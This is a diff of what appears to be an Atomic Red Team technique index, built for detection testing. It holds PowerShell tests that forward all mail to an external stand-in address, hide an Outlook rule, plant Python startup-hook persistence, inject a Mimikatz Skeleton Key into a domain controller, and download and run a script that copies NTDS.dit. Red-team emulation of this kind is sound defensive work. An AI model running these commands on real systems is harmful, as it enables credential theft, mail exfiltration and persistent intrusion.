Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$cond = $rule.Conditions.From
$cond.Enabled = $true
$cond.Recipients.Add("#{trigger_sender}")
$cond.Recipients.ResolveAll() | Out-Null
$action = $rule.Actions.DeletePermanently
$action.Enabled = $true
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
description: |
Creates an Outlook rule that automatically forwards all received emails to
an external address. Simulates Business Email Compromise (BEC) and insider
threat scenarios where adversaries establish forwarding rules to exfiltrate
mail. One of the most commonly observed real-world abuses of Outlook rules.
Detected by Exchange mail flow anomalies and Microsoft Secure Score
forwarding alerts.
NOTE: No actual email is forwarded during this test - the rule is created
but a trigger email is not sent. Run cleanup immediately after verification.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the forwarding rule
type: string
default: AtomicTest_T1137005_ForwardExfil
forward_to_address:
description: Email address to forward mail to (use a controlled test address)
type: string
default: atomictest-exfil@redteam.local
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$action = $rule.Actions.Forward
$action.Enabled = $true
$action.Recipients.Add("#{forward_to_address}")
$action.Recipients.ResolveAll() | Out-Null
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
description: |
Enumerates all Outlook rules configured on the local profile using the
PowerShell COM object. Simulates the discovery phase where an adversary
audits existing rules before implanting their own, or where a threat actor
tool such as Ruler lists rules to understand the environment. This
enumeration should itself generate telemetry - use it to validate that
your monitoring catches PowerShell spawning Outlook COM for recon purposes.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$rules = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
Write-Host "`n[*] Enumerating Outlook rules on local profile..."
Write-Host " Total rules found: $($rules.Count)`n"
for ($i = 1; $i -le $rules.Count; $i++) {
$r = $rules.Item($i)
Write-Host " Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
}
if ($rules.Count -eq 0) {
Write-Host " (No rules configured)"
}
cleanup_command: 'Write-Host "[*] No cleanup required for enumeration test."
'
- name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
description: |
Creates an Outlook rule with a zero-width space as its display name,
making it appear blank and invisible in the standard Outlook Rules UI.
Simulates the hidden inbox rule technique documented by Damian Pfammatter
(2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
during casual rule auditing. Tests whether monitoring catches rules that
are invisible in the Outlook GUI but detectable via MFCMapi or
Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
cannot be created programmatically per Microsoft's Rules object model.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
NOTE: Script is written to a temp file before execution to prevent the
ART executor's quote-wrapping from mangling the zero-width space bytes.
supported_platforms:
- windows
input_arguments:
trigger_subject:
description: Subject keyword to trigger the hidden rule
type: string
default: atomic-rt-hidden
sound_file_path:
description: Path to .wav file used as the rule action payload indicator
type: string
default: C:\Windows\Media\notify.wav
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
- description: Sound file must exist for PlaySound action
prereq_command: 'if (Test-Path "#{sound_file_path}") { exit 0 } else { exit
1 }
'
get_prereq_command: |
Write-Host "[-] Sound file not found at #{sound_file_path}"
Write-Host " Specify a valid .wav file path in the sound_file_path input argument."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
$lines = @(
'$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
'$outlook = New-Object -ComObject Outlook.Application',
'$namespace = $outlook.GetNamespace("MAPI")',
'$rules = $namespace.DefaultStore.GetRules()',
'$rule = $rules.Create($hiddenName, 0)',
'$cond = $rule.Conditions.Subject',
'$cond.Enabled = $true',
'$cond.Text = @("#{trigger_subject}")',
'$action = $rule.Actions.PlaySound',
'$action.Enabled = $true',
'$action.FilePath = "#{sound_file_path}"',
'$rule.Enabled = $true',
'$rules.Save()',
'Write-Host "[+] Hidden rule created with zero-width space name."',
'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
)
$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
Remove-Item $tmpScript -ErrorAction SilentlyContinue
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
$lines = @(
'$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
'$outlook = New-Object -ComObject Outlook.Application',
'$namespace = $outlook.GetNamespace("MAPI")',
'$rules = $namespace.DefaultStore.GetRules()',
'$removed = $false',
'for ($i = $rules.Count; $i -ge 1; $i--) {',
' if ($rules.Item($i).Name -eq $hiddenName) {',
' $rules.Remove($rules.Item($i).Name)',
' $removed = $true',
' }',
'}',
'if ($removed) {',
' $rules.Save()',
' Write-Host "[+] Hidden rule(s) removed."',
'} else {',
' Write-Host "[-] Hidden rule not found - may have already been removed."',
'}'
)
$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
Remove-Item $tmpScript -ErrorAction SilentlyContinue
atomic_tests: []
T1098.007:
technique:
type: attack-pattern
@@ -59468,7 +58924,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -59504,99 +58960,7 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Windows)
auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
description: "Executes code by placing a .pth file in the site-packages directory.
\nSupports python.exe and python3.exe via input arguments.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test.
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$TempDir = Join-Path $env:TEMP "atomic_pth_win"
New-Item -ItemType Directory -Path $TempDir -Force
& "#{python_exe}" -m venv "$TempDir\env"
$SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[+] Successfully Terminated Calculator"
- name: Python Startup Hook - usercustomize.py (Windows)
auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require Administrative privileges.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
Get-ChildItem -Path "$UserDir"
& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
-ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
}; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
(-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
| Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
|\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
\nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
-Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
-Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -60299,7 +59663,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -60329,54 +59693,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1556.005:
technique:
type: attack-pattern
@@ -62540,7 +61857,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -62567,7 +61884,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -63532,66 +62848,7 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection (Windows)
auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'winget install --id Python.Python.3 -e
'
- description: curl must be installed
prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'winget install --id cURL.cURL -e
'
- description: mitmproxy must be installed and in PATH
prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'python -m pip install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
| Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
-like "*mitmdump*" }) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
atomic_tests: []
T1205:
technique:
type: attack-pattern
@@ -67667,6 +66924,7 @@ collection:
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
description: |
Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
supported_platforms:
- windows
@@ -67708,45 +66966,6 @@ collection:
'
name: powershell
elevation_required: true
- name: RDP Bitmap Cache Extraction via bmc-tools
auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
description: |
Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
supported_platforms:
- windows
input_arguments:
cache_path:
description: Path to the RDP Cache directory or specific .bmc file
type: path
default: "$env:LOCALAPPDATA\\Microsoft\\Terminal Server Client\\Cache"
output_dir:
description: Directory to save reconstructed images
type: path
default: "$env:TEMP\\rdp_screens"
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and in the PATH to run bmc-tools.py
'
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "Please install Python manually."
'
executor:
name: powershell
elevation_required: false
command: "$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'\n$toolsDir
= \"$env:TEMP\\bmc-tools.py\"\n \n# create output directory\nNew-Item -ItemType
Directory -Path #{output_dir} -Force | Out-Null\n\n# python script download\n&
curl.exe -L $url --output $toolsDir\n \n# execution step\nif (Test-Path
$toolsDir) { python $toolsDir -s \"#{cache_path}\" -d #{output_dir} -b }\n"
cleanup_command: |
Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
T1557:
technique:
type: attack-pattern
@@ -80363,7 +79582,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -80393,54 +79612,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1556.005:
technique:
type: attack-pattern
@@ -80921,62 +80093,6 @@ credential-access:
diskshadow.exe /s #{filename}
name: command_prompt
elevation_required: true
- name: Copy NTDS in low level NTFS acquisition via MFT parsing
auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
- name: Copy NTDS in low level NTFS acquisition via fsutil
auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
T1558.003:
technique:
type: attack-pattern
@@ -81413,7 +80529,8 @@ credential-access:
'
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1} else {exit 0}
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force
'
@@ -83644,7 +82761,7 @@ discovery:
- windows
executor:
command: |
tasklist.exe /svc
tasklist.exe
sc query
sc query state= all
name: command_prompt
@@ -83679,37 +82796,6 @@ discovery:
executor:
